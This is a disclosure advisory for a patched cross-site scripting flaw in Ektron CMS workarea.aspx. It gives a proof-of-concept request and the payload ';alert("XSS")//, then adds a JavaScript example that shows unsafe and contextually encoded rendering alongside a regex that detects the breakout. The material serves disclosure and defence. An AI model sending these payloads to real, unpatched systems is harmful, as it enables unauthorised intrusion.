# Vulnerability type: Cross-site Scripting
# Vendor: http://www.ektron.com/
# Product: Ektron Content Management System
# Affected version: <= 9.10 SP1 (Build 9.1.0.184.1.102)
# Patched version: 9.10 SP1 (Build 9.1.0.184.1.114)
# Credit: Jerold Hoong

# PROOF OF CONCEPT (XSS)

Cross-site scripting (XSS) vulnerability in workarea.aspx in Ektron CMS 9.10 SP1 on build 9.1.0.184.1.102 and earlier allows remote authenticated users to inject arbitrary JavaScript via the page, action, folder_id and LangType parameters.

GET /Test/WorkArea/workarea.aspx?page=content.aspx%27%3balert%28%22XSS%22%29%2f%2f&action=ViewContentByCategory&folder_id=0&LangType=1033 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
.. [SNIP] ...
Cookie: EktGUID=014949ec-36ac-4b89-9c0b-8b03ed29b0ed; EkAnalytics=0; ASP.NET_SessionId=zxucmt5zyugbtwrm4vseakw5;
.. [SNIP] ...

# VULNERABLE PARAMETERS:
- page
- action
- folder_id
- LangType

# SAMPLE PAYLOAD
- ';alert("XSS")//

# TIMELINE
- 07/04/2015: Vulnerability found
- 07/04/2015: Vendor informed
- 08/04/2015: Vendor responded and acknowledged
- 28/05/2015: Vendor fixed the issue
- 31/05/2015: Public disclosure
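Added example, not part of the advisory and not Ektron's code: the proof-of-concept request reflects a parameter into a JavaScript string context, where `';` closes the string literal and `//` comments out the rest of the statement. The block below decodes the advisory's query string, places a naive concatenation beside a contextual JavaScript-string encoder that keeps the same value inside the literal, and runs a heuristic check of the kind a WAF rule or log review might apply. The query string is copied from the request above; `parseQuery`, `renderUnsafe`, `renderSafe`, `encodeForJsString`, `looksLikeJsBreakout` and the regex are constructed for this example.

```javascript
// Added example (not from the advisory): contextual encoding for a value that
// is reflected into an inline <script> block, checked against the advisory's payload.

// Decode a percent-encoded query string into a parameter map.
function parseQuery(qs) {
  const params = {};
  for (const pair of qs.replace(/^\?/, "").split("&")) {
    if (!pair) continue;
    const [k, v = ""] = pair.split("=");
    params[decodeURIComponent(k)] = decodeURIComponent(v.replace(/\+/g, " "));
  }
  return params;
}

// Vulnerable pattern: the raw parameter is concatenated into a JS string literal,
// so a value containing ' ends the literal and the remainder runs as code.
function renderUnsafe(page) {
  return "<script>var page = '" + page + "';</script>";
}

// Hardened pattern: encode for the JavaScript-string context. JSON.stringify
// escapes quotes and backslashes; the extra replacements stop the value from
// closing the <script> element or injecting JS line terminators.
function encodeForJsString(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

function renderSafe(page) {
  return "<script>var page = " + encodeForJsString(page) + ";</script>";
}

// Heuristic detection: a quote followed by JavaScript statement syntax, which is
// the shape of the advisory's payload. Heuristics like this belong alongside
// output encoding, not in place of it.
const BREAKOUT = /['"][\s;]*(alert|eval|document|window|[a-zA-Z_$][\w$]*\s*\()/;
function looksLikeJsBreakout(value) {
  return BREAKOUT.test(value);
}

// Query string from the advisory's request line, payload still percent-encoded.
const SAMPLE_QUERY =
  "page=content.aspx%27%3balert%28%22XSS%22%29%2f%2f" +
  "&action=ViewContentByCategory&folder_id=0&LangType=1033";

const params = parseQuery(SAMPLE_QUERY);
console.log("decoded page parameter:", params.page);
console.log("unsafe render:", renderUnsafe(params.page));
console.log("safe render:  ", renderSafe(params.page));
console.log("flagged:", looksLikeJsBreakout(params.page));
```

In the unsafe render the decoded value produces `var page = 'content.aspx';alert("XSS")//';`, two statements and a comment; in the safe render the whole value stays a single string literal that parses back to the original text, which is the property a fix should preserve for every reflected parameter, not only `page`.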